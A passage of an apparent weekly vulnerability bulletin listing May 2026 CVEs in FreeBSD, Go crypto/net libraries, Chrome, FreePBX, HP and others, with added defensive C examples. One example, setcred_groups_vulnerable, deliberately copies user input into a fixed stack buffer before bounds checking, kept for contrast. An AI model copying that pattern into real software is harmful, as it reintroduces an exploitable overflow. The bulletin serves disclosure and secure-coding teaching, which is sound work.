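	struct pollfd pfd = { .fd = fd, .events = POLLIN };
	int n;

	do {
		n = poll(&pfd, 1, timeout_ms);
	} while (n == -1 && errno == EINTR);
	return (n);
}

/*
 * Self-check on a pipe with one byte queued (constructed input): both waits
 * report readable, and a descriptor number beyond FD_SETSIZE is refused by
 * the select path before any fd_set is written.
 */
int
demo(void)
{
	int p[2], ok;

	if (pipe(p) == -1)
		return (-1);
	if (write(p[1], "x", 1) != 1)
		return (-1);
	ok = wait_readable_poll(p[0], 100) == 1 &&
	    wait_readable_select(p[0], 100) == 1 &&
	    wait_readable_select(FD_SETSIZE + 100, 100) == -1 &&
	    errno == EINVAL;
	close(p[0]);
	close(p[1]);
	return (ok ? 0 : -1);
}
```

The oversized descriptor in demo() never has to exist: the point is that the number is rejected before FD_SET() runs, which is exactly where the advisory's stack corruption happens.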
 
FreeBSD–FreeBSD The setcred(2) system call is only available to privileged users. However, before the privilege level of the caller is checked, the user-supplied list of supplementary groups is copied into a fixed-size kernel stack buffer without first validating its length. If the supplied list exceeds the capacity of that buffer, a stack buffer overflow occurs. Because the bounds check on the supplementary groups list occurs after the kernel stack buffer has already been written, an unprivileged local user may trigger the overflow without holding any special privilege. Successful exploitation may allow an attacker to execute arbitrary code in the context of the kernel, allowing an unprivileged local user to gain elevated privileges on the affected system. 2026-05-21 not yet calculated CVE-2026-45250 https://security.freebsd.org/advisories/FreeBSD-SA-26:18.setcred.asc
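An added example illustrating the check-ordering flaw the entry above describes; it is not the setcred(2) implementation or the FreeBSD patch. copyin_demo (a stand-in for copyin(9)), the NGROUPS_DEMO capacity and the struct cred_demo result type are assumptions of this example, and the order of checks in the hardened version is this example's choice.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NGROUPS_DEMO	16	/* assumed capacity of the fixed-size stack buffer */
typedef uint32_t gid_demo_t;	/* stand-in for gid_t; keeps the example portable */

/* Result of a successful call: the validated group list. */
struct cred_demo {
	size_t		ngroups;
	gid_demo_t	groups[NGROUPS_DEMO];
};

/* Stand-in for copyin(9): copy n bytes from "user" memory into a kernel buffer. */
static int
copyin_demo(const void *uaddr, void *kaddr, size_t n)
{
	if (uaddr == NULL)
		return (EFAULT);
	memcpy(kaddr, uaddr, n);
	return (0);
}

/*
 * Ordering the advisory describes: the user list is copied into a fixed
 * stack buffer first, and the length and privilege checks come afterwards.
 * With ngroups > NGROUPS_DEMO the copy overruns the buffer, and an
 * unprivileged caller reaches that copy. Kept only for contrast; never
 * call it with an oversized list.
 */
int
setcred_groups_vulnerable(const gid_demo_t *ugroups, size_t ngroups,
    int privileged)
{
	gid_demo_t groups[NGROUPS_DEMO];
	int error;

	error = copyin_demo(ugroups, groups, ngroups * sizeof(groups[0]));
	if (error != 0)
		return (error);
	if (ngroups > NGROUPS_DEMO)	/* too late: the stack is already written */
		return (EINVAL);
	if (!privileged)
		return (EPERM);
	return (0);
}

/*
 * Hardened ordering: refuse unprivileged callers before doing any work on
 * their behalf, bound the length before any user data reaches the kernel
 * stack, and only then copy.
 */
int
setcred_groups_fixed(const gid_demo_t *ugroups, size_t ngroups,
    int privileged, struct cred_demo *out)
{
	gid_demo_t groups[NGROUPS_DEMO];
	int error;

	if (!privileged)
		return (EPERM);
	if (ngroups > NGROUPS_DEMO)
		return (EINVAL);
	error = copyin_demo(ugroups, groups, ngroups * sizeof(groups[0]));
	if (error != 0)
		return (error);
	memcpy(out->groups, groups, ngroups * sizeof(groups[0]));
	out->ngroups = ngroups;
	return (0);
}

/* Self-check with a constructed three-entry list; the vulnerable path is only called in bounds. */
int
demo(void)
{
	gid_demo_t g[3] = { 10, 20, 30 };
	struct cred_demo c;

	if (setcred_groups_fixed(g, 3, 1, &c) != 0 || c.ngroups != 3 || c.groups[2] != 30)
		return (-1);
	if (setcred_groups_fixed(g, 100000, 1, &c) != EINVAL)	/* rejected before any copy */
		return (-1);
	if (setcred_groups_fixed(g, 3, 0, &c) != EPERM)
		return (-1);
	if (setcred_groups_vulnerable(g, 3, 1) != 0)
		return (-1);
	return (0);
}
```

Note that the hardened version rejects a 100000-entry request without ever dereferencing the user pointer, which is why it can also be handed a NULL pointer with an oversized length and still return EINVAL rather than EFAULT.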
 
FreeBSD–FreeBSD A file descriptor can be closed while a thread is blocked in a poll(2) or select(2) call waiting for that descriptor. Because the blocked thread does not hold a reference to the underlying object, this closure may result in the object being freed while the thread remains blocked. In this situation, the kernel must remove the blocked thread from the per-object wait queue prior to freeing the object. In the case of some file descriptor types, the kernel failed to unlink blocked threads from the object before freeing it. When the blocked thread is subsequently woken, it accesses memory that has already been freed resulting in a use-after-free vulnerability. The use-after-free vulnerability may be triggered by an unprivileged local user and can be exploited to obtain superuser privileges. 2026-05-21 not yet calculated CVE-2026-45251 https://security.freebsd.org/advisories/FreeBSD-SA-26:19.file.asc
 
FreeBSD–FreeBSD When a fusefs file system implements extended attributes, the kernel may send a FUSE_LISTXATTR message to the userspace daemon to retrieve the list of extended attributes for a given file. The FUSE protocol requires the daemon to return a packed list of NUL-terminated strings. The fusefs kernel module calls strlen() on this daemon-supplied buffer without first verifying that the entire list is NUL-terminated. If a malicious daemon sends a non-NUL-terminated list, the fusefs kernel module may read beyond the end of one heap-allocated buffer and potentially write beyond the end of a second buffer. A malicious daemon could disclose up to 253 bytes of kernel heap memory, or it could inject up to 250 attacker-controlled bytes into unallocated kernel heap space. 2026-05-21 not yet calculated CVE-2026-45252 https://security.freebsd.org/advisories/FreeBSD-SA-26:20.fusefs.asc
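An added example, not fusefs code: a bounded parser for the packed NUL-terminated name list a FUSE daemon returns, using memchr() limited by the reply length instead of strlen(), plus a copy into a fixed second buffer that refuses to overrun it. The function names, the E2BIG/ERANGE error choices, the rejection of empty names and the two sample replies are constructed for this example.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

/*
 * Parse a packed list of NUL-terminated names (the FUSE_LISTXATTR reply
 * format) trusting only `len`, never the presence of a terminator.
 * Pointers to up to `max` names are stored in `names`. Returns the number
 * of names, or -1 with errno set if the list is malformed:
 *   EINVAL  a name runs off the end of the buffer without a NUL, or is empty
 *   E2BIG   more than `max` names
 * memchr() is bounded by the remaining length, unlike strlen(), so a
 * daemon-supplied buffer can never make the scan read past buf + len.
 */
int
listxattr_parse(const char *buf, size_t len, const char **names, size_t max)
{
	size_t off = 0, n = 0;
	const char *nul;

	while (off < len) {
		nul = memchr(buf + off, '\0', len - off);
		if (nul == NULL || nul == buf + off) {
			errno = EINVAL;
			return (-1);
		}
		if (n == max) {
			errno = E2BIG;
			return (-1);
		}
		names[n++] = buf + off;
		off = (size_t)(nul - buf) + 1;
	}
	return ((int)n);
}

/*
 * Copy name `idx` of a list already validated by listxattr_parse() into a
 * caller-owned buffer, refusing to truncate. This is the "second buffer"
 * of the advisory: its bound is the destination size, not whatever length
 * the daemon implied. Returns the bytes copied including the NUL.
 */
int
listxattr_copy_name(const char *const *names, size_t n, size_t idx,
    char *dst, size_t dstlen)
{
	size_t l;

	if (idx >= n) {
		errno = ENOENT;
		return (-1);
	}
	l = strlen(names[idx]) + 1;	/* safe: termination was validated by the parser */
	if (l > dstlen) {
		errno = ERANGE;
		return (-1);
	}
	memcpy(dst, names[idx], l);
	return ((int)l);
}

/* Constructed samples: a well-formed reply, and one whose last name lacks a NUL. */
const char kGoodList[] = "user.a\0security.b\0";
const size_t kGoodLen = sizeof(kGoodList) - 1;	/* 18: drop the literal's own NUL */
const char kBadList[] = "user.a\0security.b";
const size_t kBadLen = sizeof(kBadList) - 1;	/* 17: "security.b" is unterminated */
```

With kBadList a strlen()-based scan would run past byte 17 into whatever follows; the bounded parser instead returns -1/EINVAL and the caller never copies anything.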
 
FreeBSD–FreeBSD ptrace(PT_SC_REMOTE) failed to properly validate parameters for the syscall(2) and __syscall(2) meta-system calls. As a result, a user with the ability to debug a process may trigger arbitrary code execution in the kernel, even if the target process has no special privileges. The missing validation allows an unprivileged local user to escalate privileges, potentially gaining full control of the affected system. 2026-05-21 not yet calculated CVE-2026-45253 https://security.freebsd.org/advisories/FreeBSD-SA-26:21.ptrace.asc
 
FreeBSD–FreeBSD In the case of the cap_net service, when a key present in the old limit was omitted from the new limit, the missing key was treated as “allow any” instead of being rejected. In certain scenarios, an application that had previously restricted a subset of network operations could ask for a new limit that extended the permissions of the process. 2026-05-21 not yet calculated CVE-2026-45254 https://security.freebsd.org/advisories/FreeBSD-SA-26:24.cap_net.asc
 
FreeBSD–FreeBSD When bsdinstall or bsdconfig are prompted to scan for nearby Wi-Fi networks, they build up a list of network names and use bsddialog(1) to prompt the user to select a network. This is implemented using a shell script, and the code which handled network names was not careful to prevent expansion by the shell. As a result, a suitably crafted network name can be used to execute commands via a subshell. The problem can be exploited to execute code as root on the system running bsdinstall or bsdconfig. The attacker would need to create an access point with a specially crafted name and be within range of a Wi-Fi scan. Note that bsdinstall and bsdconfig are vulnerable as soon as the user prompts them to scan for nearby networks; they do not need to actually select the malicious network. 2026-05-21 not yet calculated CVE-2026-45255 https://security.freebsd.org/advisories/FreeBSD-SA-26:23.bsdinstall.asc
 
FreePBX–security-reporting FreePBX is an open source IP PBX. In versions below 16.0.71 and 17.0.6, the backup module does not properly sanitize data during restore operations, potentially leading to compromise if the backup contains carefully crafted hostile data. During backup restore operations, FreePBX extracts selected files from a user-supplied tar archive. If a malicious file exists in the archive, it is read and passed directly to unserialize() without validation, class restrictions, or integrity checks. This issue allows Remote Code Execution during restoration of the backup as the web server user (typically asterisk or www-data). The attack does not require shell access, CLI access, or filesystem write permissions beyond the normal restore workflow. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This issue has been fixed in versions 16.0.71 and 17.0.6. 2026-05-18 not yet calculated CVE-2026-26978 https://github.com/FreePBX/security-reporting/security/advisories/GHSA-5v7h-49gr-jcwr
https://github.com/FreePBX/backup/commit/45c57e1207cbf9fd1c5f76f8a3e72d204a69a472
https://github.com/FreePBX/backup/commit/64781af5c80cce0cff21a981be4d8e6a7a71f2c4
 
glpi-project–glpi GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms. This issue has been fixed in version 11.0.7. 2026-05-18 not yet calculated CVE-2026-32312 https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626
https://github.com/glpi-project/glpi/releases/tag/11.0.7
 
goauthentik–authentik authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, authenticated non-admin users with at least one OAuth2 access token can retrieve the client_secret of confidential OAuth2 providers they have previously authenticated against, exposing sensitive information to users without the correct permissions. The affected endpoint is GET /api/v3/oauth2/access_tokens/. The API response includes a nested provider object containing client_id and client_secret for providers configured with client_type: confidential, which should not be accessible to low-privilege users. This issue has been fixed in versions 2025.12.5 and 2026.2.3. 2026-05-22 not yet calculated CVE-2026-40166 https://github.com/goauthentik/authentik/security/advisories/GHSA-hhpc-rqgm-pxj4
https://github.com/goauthentik/authentik/releases/tag/version%2F2025.12.5
https://github.com/goauthentik/authentik/releases/tag/version%2F2026.2.3
 
gohttp–gohttp An issue in gohttp commit 34ea51 allows attackers to execute a directory traversal via supplying a crafted request. 2026-05-19 not yet calculated CVE-2025-70950 https://github.com/itang/gohttp/issues/13
https://gist.github.com/Lime-Cocoa/202127ae5f4dcc4b39909ce7ac1c8466
 
golang.org/x/crypto–golang.org/x/crypto/ssh An authenticated SSH client that repeatedly opened channels which were rejected by the server caused unbounded memory growth, eventually crashing the server process and affecting all connected users. Rejected channels are now properly removed from the connection’s internal state and released for garbage collection. 2026-05-22 not yet calculated CVE-2026-39827 https://go.dev/issue/35127
https://go.dev/cl/781320
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://pkg.go.dev/vuln/GO-2026-5016
 
golang.org/x/crypto–golang.org/x/crypto/ssh When an SSH server authentication callback returned PartialSuccessError with non-nil Permissions, those permissions were silently discarded, potentially dropping certificate restrictions such as force-command after a second factor succeeded. Returning non-nil Permissions with PartialSuccessError now results in a connection error. 2026-05-22 not yet calculated CVE-2026-39828 https://go.dev/issue/79562
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781621
https://pkg.go.dev/vuln/GO-2026-5014
 
golang.org/x/crypto–golang.org/x/crypto/ssh The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2. 2026-05-22 not yet calculated CVE-2026-39829 https://go.dev/issue/79565
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781641
https://go.dev/cl/781661
https://pkg.go.dev/vuln/GO-2026-5018
 
golang.org/x/crypto–golang.org/x/crypto/ssh A malicious SSH peer could send unsolicited global request responses to fill an internal buffer, blocking the connection’s read loop. The blocked goroutine could not be released by calling Close(), resulting in a resource leak per connection. Unsolicited global responses are now discarded. 2026-05-22 not yet calculated CVE-2026-39830 https://go.dev/issue/79564
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781640
https://go.dev/cl/781664
https://pkg.go.dev/vuln/GO-2026-5017
 
golang.org/x/crypto–golang.org/x/crypto/ssh The Verify() method for FIDO/U2F security key types (sk-ecdsa-sha2-nistp256@openssh.com, sk-ssh-ed25519@openssh.com) did not check the User Presence flag. Signatures generated without physical touch were accepted, allowing unattended use of a hardware security key. To restore the previous behavior, return a “no-touch-required” extension in Permissions.Extensions from PublicKeyCallback. 2026-05-22 not yet calculated CVE-2026-39831 https://go.dev/issue/79566
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781662
https://pkg.go.dev/vuln/GO-2026-5019
 
golang.org/x/crypto–golang.org/x/crypto/ssh When writing data larger than 4GB in a single Write call on an SSH channel, an integer overflow in the internal payload size calculation caused the write loop to spin indefinitely, sending empty packets without making progress. The size comparison now uses int64 to prevent truncation. 2026-05-22 not yet calculated CVE-2026-39834 https://go.dev/issue/79567
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781663
https://pkg.go.dev/vuln/GO-2026-5020
 
golang.org/x/crypto–golang.org/x/crypto/ssh SSH servers which use CertChecker as a public key callback without setting IsUserAuthority or IsHostAuthority could be caused to panic by a client presenting a certificate. CertChecker now returns an error instead of panicking when these callbacks are nil. 2026-05-22 not yet calculated CVE-2026-39835 https://go.dev/issue/79563
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781660
https://pkg.go.dev/vuln/GO-2026-5015
 
golang.org/x/crypto–golang.org/x/crypto/ssh CVE-2024-45337 previously fixed an authorization bypass in misused SSH server configurations, but the fix was incomplete: if any callback type other than the public key callback was passed, source-address validation was still skipped. 2026-05-22 not yet calculated CVE-2026-46595 https://go.dev/issue/79570
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781642
https://pkg.go.dev/vuln/GO-2026-5023
 
golang.org/x/crypto–golang.org/x/crypto/ssh An incorrectly placed cast from bytes to int allowed for server-side panic in the AES-GCM packet decoder for well-crafted inputs. 2026-05-22 not yet calculated CVE-2026-46597 https://go.dev/issue/79561
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://go.dev/cl/781620
https://pkg.go.dev/vuln/GO-2026-5013
 
golang.org/x/crypto–golang.org/x/crypto/ssh/agent When adding a key to a remote agent constraint extensions such as restrict-destination-v00@openssh.com were not serialized in the request. Destination restrictions were silently stripped when forwarding keys, allowing unrestricted use of the key on the remote host. The client now serializes all constraint extensions. Additionally, the in-memory keyring returned by NewKeyring() now rejects keys with unsupported constraint extensions instead of silently ignoring them. 2026-05-22 not yet calculated CVE-2026-39832 https://go.dev/issue/79435
https://go.dev/cl/778642
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://pkg.go.dev/vuln/GO-2026-5006
 
golang.org/x/crypto–golang.org/x/crypto/ssh/agent The in-memory keyring returned by NewKeyring() silently accepted keys with the ConfirmBeforeUse constraint but never enforced it. The key would sign without any confirmation prompt, with no indication to the caller that the constraint was not in effect. NewKeyring() now returns an error when unsupported constraints are requested. 2026-05-22 not yet calculated CVE-2026-39833 https://go.dev/issue/79436
https://go.dev/cl/778640
https://go.dev/cl/778641
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://pkg.go.dev/vuln/GO-2026-5005
 
golang.org/x/crypto–golang.org/x/crypto/ssh/agent For certain crafted inputs, an ed25519.PrivateKey was created by casting malformed wire bytes, leading to a panic when used. 2026-05-22 not yet calculated CVE-2026-46598 https://go.dev/issue/79596
https://go.dev/cl/781360
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://pkg.go.dev/vuln/GO-2026-5033
 
golang.org/x/crypto–golang.org/x/crypto/ssh/knownhosts Previously, a revoked ‘SignatureKey’ belonging to a CA was not correctly checked for revocation. Now, both the ‘key’ and ‘key.SignatureKey’ are checked for @revoked. 2026-05-22 not yet calculated CVE-2026-42508 https://go.dev/issue/79568
https://go.dev/cl/781220
https://groups.google.com/g/golang-announce/c/a082jnz-LvI
https://pkg.go.dev/vuln/GO-2026-5021
 
golang.org/x/net–golang.org/x/net/html Parsing arbitrary HTML can consume excessive CPU time, possibly leading to denial of service. 2026-05-22 not yet calculated CVE-2026-25680 https://go.dev/cl/781702
https://go.dev/issue/79573
https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8
https://pkg.go.dev/vuln/GO-2026-5028
 
golang.org/x/net–golang.org/x/net/html Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. 2026-05-22 not yet calculated CVE-2026-25681 https://go.dev/issue/79574
https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8
https://go.dev/cl/781703
https://pkg.go.dev/vuln/GO-2026-5029
 
golang.org/x/net–golang.org/x/net/html Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. 2026-05-22 not yet calculated CVE-2026-27136 https://go.dev/issue/79575
https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8
https://go.dev/cl/781685
https://pkg.go.dev/vuln/GO-2026-5030
 
golang.org/x/net–golang.org/x/net/html Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. 2026-05-22 not yet calculated CVE-2026-42502 https://go.dev/issue/79572
https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8
https://go.dev/cl/781701
https://pkg.go.dev/vuln/GO-2026-5027
 
golang.org/x/net–golang.org/x/net/html Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. 2026-05-22 not yet calculated CVE-2026-42506 https://go.dev/issue/79571
https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8
https://go.dev/cl/781700
https://pkg.go.dev/vuln/GO-2026-5025
 
golang.org/x/net–golang.org/x/net/idna The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode(“xn--example-.com”) incorrectly returns the name “example.com” rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject “example.com” but permit “xn--example-.com”. If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permit access to the Unicode name “example.com”. 2026-05-22 not yet calculated CVE-2026-39821 https://go.dev/cl/767220
https://go.dev/issue/78760
https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8
https://pkg.go.dev/vuln/GO-2026-5026
 
golang.org/x/sys–golang.org/x/sys/windows NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error. 2026-05-22 not yet calculated CVE-2026-39824 https://go.dev/issue/78916
https://go.dev/cl/770080
https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg
https://pkg.go.dev/vuln/GO-2026-5024
 
Google–Chrome Inappropriate implementation in UI in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Critical) 2026-05-20 not yet calculated CVE-2026-9110 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/503551154
 
Google–Chrome Use after free in WebRTC in Google Chrome on Linux prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) 2026-05-20 not yet calculated CVE-2026-9111 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/504551032
 
Google–Chrome Use after free in GPU in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9112 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/489791425
 
Google–Chrome Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9113 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/489585044
 
Google–Chrome Use after free in QUIC in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9114 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/495798630
 
Google–Chrome Insufficient policy enforcement in Service Worker in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9115 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/495999481
 
Google–Chrome Insufficient policy enforcement in ServiceWorker in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9116 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/497436273
 
Google–Chrome Type Confusion in GFX in Google Chrome on Linux, ChromeOS prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9117 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/497542537
 
Google–Chrome Use after free in XR in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9118 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/498702233
 
Google–Chrome Heap buffer overflow in WebRTC in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9119 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/502661101
 
Google–Chrome Use after free in WebRTC in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) 2026-05-20 not yet calculated CVE-2026-9120 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/504620824
 
Google–Chrome Out of bounds read in GPU in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) 2026-05-20 not yet calculated CVE-2026-9121 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/488064108
 
Google–Chrome Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) 2026-05-20 not yet calculated CVE-2026-9122 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/489579953
 
Google–Chrome Heap buffer overflow in Chromecast in Google Chrome on Android, Linux, ChromeOS prior to 148.0.7778.179 allowed a local attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: Medium) 2026-05-20 not yet calculated CVE-2026-9123 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/495988507
 
Google–Chrome Insufficient validation of untrusted input in Input in Google Chrome prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) 2026-05-20 not yet calculated CVE-2026-9124 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/496375695
 
Google–Chrome Use after free in DOM in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) 2026-05-20 not yet calculated CVE-2026-9126 https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html
https://issues.chromium.org/issues/496280532
 
HP Inc–HP Linux Imaging and Printing Software A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via an integer overflow in the hpcups processing path when handling crafted print data. 2026-05-20 not yet calculated CVE-2026-8631 https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118
 
HP Inc–HP Linux Imaging and Printing Software A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via operating system command injection. 2026-05-20 not yet calculated CVE-2026-8632 https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118
 
HP–ENVY 5000 HP ENVY 5000 series printers VERBASPP1N003.2237A.00 do not properly manage concurrent TCP connections to port 9100 (JetDirect/RAW printing). An unauthenticated remote attacker on the same network can establish a persistent connection to port 9100 and send keep-alive packets, causing the printer’s session threads to remain locked in a waiting state. The firmware lacks connection timeouts and concurrent session limits, resulting in a persistent Denial of Service (DoS) that renders the printer unresponsive to all user commands and print jobs. Physical intervention (manual restart) is required to restore functionality, and the attack can be immediately re-initiated. 2026-05-22 not yet calculated CVE-2026-42626 https://medium.com/@jacobmasse/hp-envy-5000-printer-dos-vulnerability-8cae52c87b41
 
HSC–MailInspector v5.3.3-7 HSC MailInspector v5.3.3-7 contains a Local File Inclusion (LFI) vulnerability caused by improper control of user-supplied file paths. The endpoint /vendor/phpunit/phpunit.php processes user-controlled parameters that directly affect file access operations without adequate validation, sanitization, or path restriction. This allows a remote attacker to exploit Path Traversal techniques to read arbitrary files from the underlying operating system and application directories, leading to sensitive information disclosure. 2026-05-18 not yet calculated CVE-2026-29962 https://github.com/sql3t0/cve-disclosures
https://hsclabs.com/pt-br/mailinspector
https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md
 
HSC–MailInspector v5.3.3-7 HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information. 2026-05-18 not yet calculated CVE-2026-29963 https://hsclabs.com/pt-br/mailinspector/
https://github.com/sql3t0/cve-disclosures
https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md
 
HSC–MailInspector v5.3.3-7 HSC MailInspector v5.3.3-7 contains a Cross-Site Scripting (XSS) vulnerability in the /tap/tap.php endpoint due to improper neutralization of user-controlled input using alternate or obfuscated JavaScript syntax. The endpoint reflects unsanitized user input in HTTP responses without adequate output encoding, allowing a remote attacker to execute arbitrary JavaScript code in the context of a victim’s browser. 2026-05-18 not yet calculated CVE-2026-29964 https://hsclabs.com/pt-br/mailinspector/
https://github.com/sql3t0/cve-disclosures
https://github.com/sql3t0/cve-disclosures/blob/main/03_-_CVE-2026-29964_XSS.md
 
HSC–MailInspector v5.3.3-7 HSC MailInspector 5.3.3-7 is vulnerable to Cross Site Scripting (XSS) in the /police/WarningUrlPage.php endpoint due to improper neutralization of user-supplied input that uses alternate or obfuscated JavaScript syntax. 2026-05-18 not yet calculated CVE-2026-29965 https://hsclabs.com/pt-br/mailinspector/
https://github.com/sql3t0/cve-disclosures
https://github.com/sql3t0/cve-disclosures/blob/main/04_-_CVE-2026-29965_XSS.md
 
